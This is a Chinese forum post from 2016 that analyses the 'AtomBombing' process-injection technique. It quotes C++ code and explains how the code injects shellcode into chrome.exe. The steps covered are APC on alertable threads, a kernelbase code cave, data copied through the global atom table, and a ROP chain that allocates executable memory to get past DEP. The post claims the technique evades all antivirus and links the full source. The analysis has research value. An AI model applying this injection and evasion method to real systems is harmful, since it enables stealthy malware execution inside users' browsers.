本帖最后由 sfz009900 于 2016-10-29 01:18 编辑
这里只是简单分析一下原作者的代码思路,号称绕过所有杀软好像
[C++] 纯文本查看 复制代码 eReturn = main_OpenProcessByName(L"chrome.exe", &hProcess);//打开进程
================================================================================
[C++] 纯文本查看 复制代码 eReturn = main_FindAlertableThread(hProcess, &hAlertableThread);
//遍历所有线程,然后循环对目标进程的所有线程通过APC去调用WaitForSingleObjectEx来等待我们的当前线程,然后在本地创建和线程数目相等的Event,然后通过duplicate复制每个event句柄到目标进程的句柄表里,实现进程间通信,然后循环把所有线程都挂起然后调用SetEvent设置event信号,然后都用WaitForSingleObjectEx去等待当前线程(5秒然后恢复线程),最后用WaitForMultipleObjects去等待所有event,然后把第一个返回的再用WaitForSingleObjectEx永久等待(之前调用WaitForSingleObjectEx的超时都是5秒)
================================================================================
[C++] 纯文本查看 复制代码 eReturn = main_GetCodeCaveAddress(&pvCodeCave);//获取代码空洞地址,就用kernelbase.dll的.data节的虚拟地址+SizeOfRawData
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
================================================================================
这里拷贝到目标进程的数据构造
[C++] 纯文本查看 复制代码 pvRemoteROPChainAddress = pvCodeCave;
pvRemoteContextAddress = (PUCHAR)pvRemoteROPChainAddress + sizeof(ROPCHAIN);
pvRemoteGetProcAddressLoadLibraryAddress = (PUCHAR)pvRemoteContextAddress + FIELD_OFFSET(CONTEXT, ExtendedRegisters);
pvRemoteShellcodeAddress = (PUCHAR)pvRemoteGetProcAddressLoadLibraryAddress + 8;
//我这里获取的那个Cave地址是0x76d01400,所以这里这么放的
[C++] 纯文本查看 复制代码 pvRemoteROPChainAddress = 0x76d01400,存放的是ROPCHAIN结构体
pvRemoteContextAddress = 0x76d0142c,等于ROPCHAIN的大小是2c
pvRemoteGetProcAddressLoadLibraryAddress = 0x76d014f8,扽与CONTENT的大小是0xcc
pvRemoteShellcodeAddress = 0x76d01500,就是pvRemoteGetProcAddressLoadLibraryAddress +8,pvRemoteGetProcAddressLoadLibraryAddress 里放的就是GetProcAddress和LoadLibrary的地址
================================================================================
[C++] 纯文本查看 复制代码 eReturn = main_BuildROPChain(pvRemoteROPChainAddress, pvRemoteShellcodeAddress, &tRopChain);
typedef struct _ROPCHAIN
{
// Return address of ntdll!ZwAllocateMemory
PVOID pvMemcpy;
// Params for ntdll!ZwAllocateMemory
HANDLE ZwAllocateMemoryhProcess;
PVOID ZwAllocateMemoryBaseAddress;
ULONG_PTR ZwAllocateMemoryZeroBits;
PSIZE_T ZwAllocateMemoryRegionSize;
ULONG ZwAllocateMemoryAllocationType;
ULONG ZwAllocateMemoryProtect;
// Return address of ntdll!memcpy
PVOID pvRetGadget;
// Params for ntdll!memcpy
PVOID MemcpyDestination;
PVOID MemcpySource;
SIZE_T MemcpyLength;
} ROPCHAIN, *PROPCHAIN;
tContext.Eip = (DWORD) GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwAllocateVirtualMemory");
tContext.Ebp = (DWORD)(PUCHAR)pvRemoteROPChainAddress;
tContext.Esp = (DWORD)(PUCHAR)pvRemoteROPChainAddress;
[C++] 纯文本查看 复制代码 //这个函数就是构造ROP,然后通过设置线程环境的EIP为AllocateVirtualMemory,esp和ebp为拷贝到远程的pvRemoteROPChainAddress的地址(远程拷贝一会说),结合上面的ROPCHAIN结构的实际数据来举例,当目标线程恢复后跳到AllocateVirtualMemory入口点,因为esp地址为pvRemoteROPChainAddress了,所以pvMemcpy为函数返回地址,下面6个为参数,实为AllocateVirtualMemory(0xffffffff,0x76d01420,0,0x76d01428,0x1000,0x40);可以看到保护为0x40,实为PAGE_EXECUTE_READWRITE,根据原文中作者的意思是过DEP,AllocateVirtualMemory调用完了之后就跳到Memcpy去执行,现在esp的结构是
,
[C++] 纯文本查看 复制代码 pvRetGadget是返回地址,下面3个是参数,pvRetGadget实际只是一个ret指令在ntdll.dll的地址,实为memcpy(0,0x76d01500,0x171);这里目标为0,是因为AllocateVirtualMemory的目标地址为0x76d01420,AllocateVirtualMemory调用完了后这里就会放一个地址了,memcpy拷贝完shellcode后,就会返回到pvRetGadget去执行,ret就会返回到0x76d01420里的拷贝过来的shellcode去执行了
===============================================================================
最后说下它拷贝数据到远程进程的方法,它首先通过GlobalAddAtom函数把要拷贝的数据放到原子表里,然后得到原子,再用APC在目标线程用原子调用GlobalGetAtomName把原子里的数据放到远程内存地址里
=========================================
不知道能放原帖地址不,怕违规暂时先不放了,下面是利用源码
atom-bombing-master.zip
(16.6 KB, 下载次数: 58)
| 
[复制链接]
发表于 2016-10-29 00:43
